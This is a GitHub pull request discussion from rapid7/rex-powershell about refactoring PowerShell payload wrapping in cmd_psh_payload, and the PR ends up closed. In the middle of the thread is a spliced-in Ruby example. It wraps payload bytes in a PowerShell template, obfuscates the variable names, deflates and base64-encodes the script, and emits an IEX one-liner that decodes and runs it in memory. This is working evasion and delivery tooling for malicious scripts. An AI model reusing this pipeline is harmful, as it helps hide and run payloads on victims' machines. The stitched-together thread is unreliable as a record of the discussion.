rapid7 / rex-powershell

Rex library for dealing with Powershell Scripts

Small refactoring in cmd_psh_payload #37

Closed red0xff closed 1 year ago

red0xff commented 2 years ago

This refactoring moves the code that wraps native payloads in a Powershell script to a separate method, psh_payload. This can reduce redundancy: the lines are used by psh_payload, but are also the same at:

https://github.com/rapid7/metasploit-framework/blob/b11237fea02f1c7a6776e35fedb6fb5df70a1033/modules/post/multi/manage/shell_to_meterpreter.rb#L144-L160

(If this change is approved, I'll also add a wrapper for psh_payload at Msf::Exploit::Powershell, and I'll update post/multi/manage/shell_to_meterpreter accordingly. I made this change because I needed to use the code in psh_payload for fixing another module.)

I also made a few minor changes to comments. exec_rc4 was undocumented, for example.

Verification

bwatters-r7 commented 2 years ago

I was just looking through this, and I realize that the rc4 changes are not here. Would you care to rebase this and manually add the rc4 changes made since this PR was created?

gwillcox-r7 commented 2 years ago

@red0xff @bwatters-r7 Any update on this?

bwatters-r7 commented 2 years ago

This needs to be either rebased or have someone do a manual deconflict merge. Since the rc4 changes that need to get pulled in were relatively new and I wrote them, I was hoping for the author to deconflict and rebase/retest. It's been long enough that I can go ahead and manually deconflict and merge when I'm back on PRs.

red0xff commented 2 years ago

Hey @bwatters-r7 @gwillcox-r7, I totally forgot about this pull request, sorry for that; I even forgot about its purpose / the reusability I had in mind when I opened it.

I just did a rebase, I'll test it again, and will have a look at the subsequent changes I had in mind when I opened it.

sempervictus commented 1 year ago

A quick glance over this makes me think it breaks obfuscation of the powershell. I was never a fan of the templates thing in the first place, but the way things work today, you can apply obfu passes to the template's product before encoding, compressing, encrypting, etc.
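
The two design points raised in this thread, wrapping a native payload into a PowerShell script through a template (the psh_payload refactor in the opening comment) and running obfuscation passes on the template's product before it is compressed and encoded (the ordering concern above), can be shown end to end with a small Ruby pipeline. The block below is an added example and is not rex-powershell's or Metasploit's own code: `TEMPLATE`, `RENAMEABLE`, `wrap_native_payload`, `obfuscate_identifiers`, `compress_script`, `compressed_loader`, `build_command` and `build_command_wrong_order` are hypothetical names, the template is a constructed stand-in for the library's real templates, and `SAMPLE_PAYLOAD` is a few constructed placeholder bytes rather than real shellcode. The compressed loader uses the standard `IO.Compression.DeflateStream` decompress-and-`IEX` pattern, so the deflate step must produce a raw DEFLATE stream (negative window bits in zlib).

```ruby
require 'base64'
require 'securerandom'
require 'zlib'

# Constructed placeholder bytes standing in for a native payload (not real shellcode).
SAMPLE_PAYLOAD = [0x90, 0x90, 0xC3].pack('C*').freeze

# Hypothetical loader template (not Rex::Powershell's own). %{b64} receives the payload's
# base64; the variables listed in RENAMEABLE are the targets of the obfuscation pass.
TEMPLATE = <<~'PS'
  $payload = [Convert]::FromBase64String('%{b64}')
  $buf = [Runtime.InteropServices.Marshal]::AllocHGlobal($payload.Length)
  [Runtime.InteropServices.Marshal]::Copy($payload, 0, $buf, $payload.Length)
  Write-Output ("staged {0} bytes" -f $payload.Length)
PS
RENAMEABLE = %w[payload buf].freeze

# PowerShell variable names must not start with a digit, so prefix a letter.
def random_identifier(len = 8)
  'v' + SecureRandom.alphanumeric(len)
end

# Step 1: wrap raw native bytes in a script. This is the job a psh_payload-style helper
# takes over so that modules do not re-implement the same template fill-in.
def wrap_native_payload(bytes)
  format(TEMPLATE, b64: Base64.strict_encode64(bytes))
end

# Step 2: an identifier-renaming pass over the template's product. It only works on plaintext
# PowerShell: once the script is compressed or base64-encoded there is nothing left to match.
def obfuscate_identifiers(script, names = RENAMEABLE, namer = method(:random_identifier))
  mapping = names.map { |n| [n, namer.call] }.to_h
  out = script
  mapping.each { |old, new| out = out.gsub(/\$#{Regexp.escape(old)}\b/, "$#{new}") }
  [out, mapping]
end

# Step 3: raw DEFLATE (what IO.Compression.DeflateStream expects) plus base64.
def compress_script(script)
  z = Zlib::Deflate.new(Zlib::BEST_COMPRESSION, -Zlib::MAX_WBITS)
  data = z.deflate(script, Zlib::FINISH)
  z.close
  Base64.strict_encode64(data)
end

# Inverse of compress_script, used here to show what the target would execute.
def decompress_script(b64)
  Zlib::Inflate.new(-Zlib::MAX_WBITS).inflate(Base64.strict_decode64(b64))
end

# One-liner that inflates the blob in memory and evaluates it.
def compressed_loader(b64)
  "$s=New-Object IO.MemoryStream(,[Convert]::FromBase64String('#{b64}'));" \
  "IEX (New-Object IO.StreamReader(New-Object IO.Compression.DeflateStream($s," \
  "[IO.Compression.CompressionMode]::Decompress))).ReadToEnd()"
end

# Correct order: template -> obfuscate -> compress/encode.
def build_command(bytes, namer = method(:random_identifier))
  plain = wrap_native_payload(bytes)
  obf, mapping = obfuscate_identifiers(plain, RENAMEABLE, namer)
  { loader: compressed_loader(compress_script(obf)), plaintext: obf, mapping: mapping }
end

# Wrong order: compress first, obfuscate afterwards. The pass finds no '$payload' in base64
# text, so the original identifiers come back verbatim when the loader inflates the blob.
def build_command_wrong_order(bytes)
  b64 = compress_script(wrap_native_payload(bytes))
  obf, _mapping = obfuscate_identifiers(b64)
  { loader: compressed_loader(obf), recovered: decompress_script(b64) }
end

if __FILE__ == $PROGRAM_NAME
  result = build_command(SAMPLE_PAYLOAD)
  puts result[:plaintext]
  puts result[:loader]
end
```

Running the file prints the obfuscated script and the compressed one-liner; `decompress_script` on the blob inside the loader yields exactly the obfuscated plaintext, while `build_command_wrong_order` shows the unrenamed template coming back out of the blob, which is the breakage the comment above is warning about when the wrapping and encoding steps are reshuffled.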

gwillcox-r7 commented 1 year ago

Given this has been open for a while now with no conclusion on how to proceed, and the code has changed significantly since this was opened, I'm going to close this out for now. If we want to proceed with this I'd suggest that we discuss things further if there is still an interest and then look at reopening this PR.